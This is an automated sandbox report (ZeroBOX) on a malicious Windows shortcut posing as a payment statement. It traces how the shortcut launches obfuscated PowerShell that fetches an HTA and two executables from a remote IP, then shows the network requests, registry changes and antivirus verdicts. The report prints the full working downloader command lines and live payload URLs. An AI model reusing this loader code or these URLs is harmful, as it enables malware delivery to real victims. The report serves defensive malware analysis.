Summary | ZeroBOX

Updated_Payments_Statements.link.lnk

Cobalt Strike Darkside Ransomware Generic Malware UPX Antivirus Malicious Library GIF Format OS Processor Check PE32 PE File AntiVM AntiDebug
Category FILE
Machine s1_win7_x6402
Started Jan. 18, 2022, 4:40 p.m.
Completed Jan. 18, 2022, 4:43 p.m.
Size 2.6KB
Type MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=14, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5 8bdf50e9270b6f6e3c461be75999305d
SHA256 776f2d2c4538ee81f960ac512214317e78e61728c48302356ec8734fa1d0b7e6
CRC32 BF123FD6
ssdeep 24:8A2/BHYVKVWf+/CWbll/SsrdTeF+ajUnpDh+/E4I0arab0mN:8v5ayll/by5jUNhAIZaj
Yara
  • Antivirus - Contains references to security software
  • Generic_Malware_Zero - Generic Malware
  • Lnk_Format_Zero - LNK Format

  • cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RZcvibqEQ" C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk

    2192
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));

      2272
      • mshta.exe "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta

        2436
        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;

          1088

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
179.43.187.183 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:395
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: .EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,1
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: 3232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Star
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: t-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,132
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: 02,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]:
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: : <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadD
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: ata($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[cha
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: r]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: 220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + '
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: 3225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: cx $Q;;;}Tf;
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x0000012b
1 1 0

Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006f6078
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/invoice.hta
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/invoice.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://179.43.187.183/hhfm/payment.exe
request GET http://179.43.187.183/hhfm/invoice.hta
request GET http://179.43.187.183/hhfm/invoice.exe
request GET http://179.43.187.183/hhfm/payment.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2272
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a00000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2272
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2272
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73ce1000
process_handle: 0xffffffff
1 0 0

file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
file C:\Users\test22\AppData\Local\Temp\Updated_Payments_Statements.link.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell.exe -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $dR=@(42117,42123,42112,42124,42105,42040,42112,42124,42124,42120,42066,42055,42055,42057,42063,42065,42054,42060,42059,42054,42057,42064,42063,42054,42057,42064,42059,42055,42112,42112,42110,42117,42055,42113,42118,42126,42119,42113,42107,42109,42054,42112,42124,42105);$H=@(42081,42077,42096);function J($UD){$dR=42008;$Pf=$Null;foreach($pb in $UD){$Pf+=[char]($pb-$dR)};return $Pf};sal QbxXCDZHn (J $H);QbxXCDZHn((J $dR));
cmdline "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -ExecutionPolicy UnRestricted function SX($R, $Up){[IO.File]::WriteAllBytes($R, $Up)};function cx($R){if($R.EndsWith((y @(13161,13215,13223,13223))) -eq $True){Start-Process (y @(13229,13232,13225,13215,13223,13223,13166,13165,13161,13216,13235,13216)) $R}else{Start-Process $R}};function W($d){$xv = New-Object (y @(13193,13216,13231,13161,13202,13216,13213,13182,13223,13220,13216,13225,13231));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$Up = $xv.DownloadData($d);return $Up};function y($c){$U=13115;$a=$Null;foreach($z in $c){$a+=[char]($z-$U)};return $a};function Tf(){$SL = $env:APPDATA + '\';$b = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13220,13225,13233,13226,13220,13214,13216,13161,13216,13235,13216));$TK = $SL + 'invoice.exe';SX $TK $b;cx $TK;;$Qw = W (y @(13219,13231,13231,13227,13173,13162,13162,13164,13170,13172,13161,13167,13166,13161,13164,13171,13170,13161,13164,13171,13166,13162,13219,13219,13217,13224,13162,13227,13212,13236,13224,13216,13225,13231,13161,13216,13235,13216,13124));$Q = $SL + 'payment.exe ';SX $Q $Qw;cx $Q;;;}Tf;
filepath: powershell.exe
1 1 0
Bkav VEX.Webshell
Sangfor Trojan.Generic-LNK.Save.08c86e64
Symantec CL.Downloader!gen111
ESET-NOD32 LNK/TrojanDownloader.Agent.AJP
Tencent Win32.Trojan-downloader.Agent.Eerv
Sophos Troj/LnkObf-G
SentinelOne Static AI - Suspicious LNK
VBA32 Trojan.Link.ShellCmd
Zoner Probably Heur.LNKScript
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data sent GET /hhfm/invoice.exe HTTP/1.1 Host: 179.43.187.183 Connection: Keep-Alive
Data sent GET /hhfm/payment.exe HTTP/1.1 Host: 179.43.187.183
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
host 179.43.187.183
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002f0
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe
count 2316 name heapspray process powershell.exe total_mb 144 length 65536 protection PAGE_READWRITE
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x000002f0
regkey_r: ProxyOverride
reg_type: 1 (REG_SZ)
value: 127.0.0.1:16107;
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
1 0 0
Time & API Arguments Status Return Repeated

send

buffer: GET /hhfm/invoice.exe HTTP/1.1 Host: 179.43.187.183 Connection: Keep-Alive
socket: 1420
sent: 80
1 80 0

send

buffer: GET /hhfm/payment.exe HTTP/1.1 Host: 179.43.187.183
socket: 1420
sent: 56
1 56 0
parent_process powershell.exe martian_process "C:\Windows\system32\mshta.exe" http://179.43.187.183/hhfm/invoice.hta
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\invoice.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\invoice.exe"
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\payment.exe
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Roaming\payment.exe"
Process injection Process 2192 resumed a thread in remote process 2272
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000330
suspend_count: 1
process_identifier: 2272
1 0 0
option -executionpolicy unrestricted value Attempts to bypass execution policy
option -executionpolicy unrestricted value Attempts to bypass execution policy
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Windows\System32\mshta.exe
file C:\Users\test22\AppData\Roaming\invoice.exe
file C:\Users\test22\AppData\Roaming\payment.exe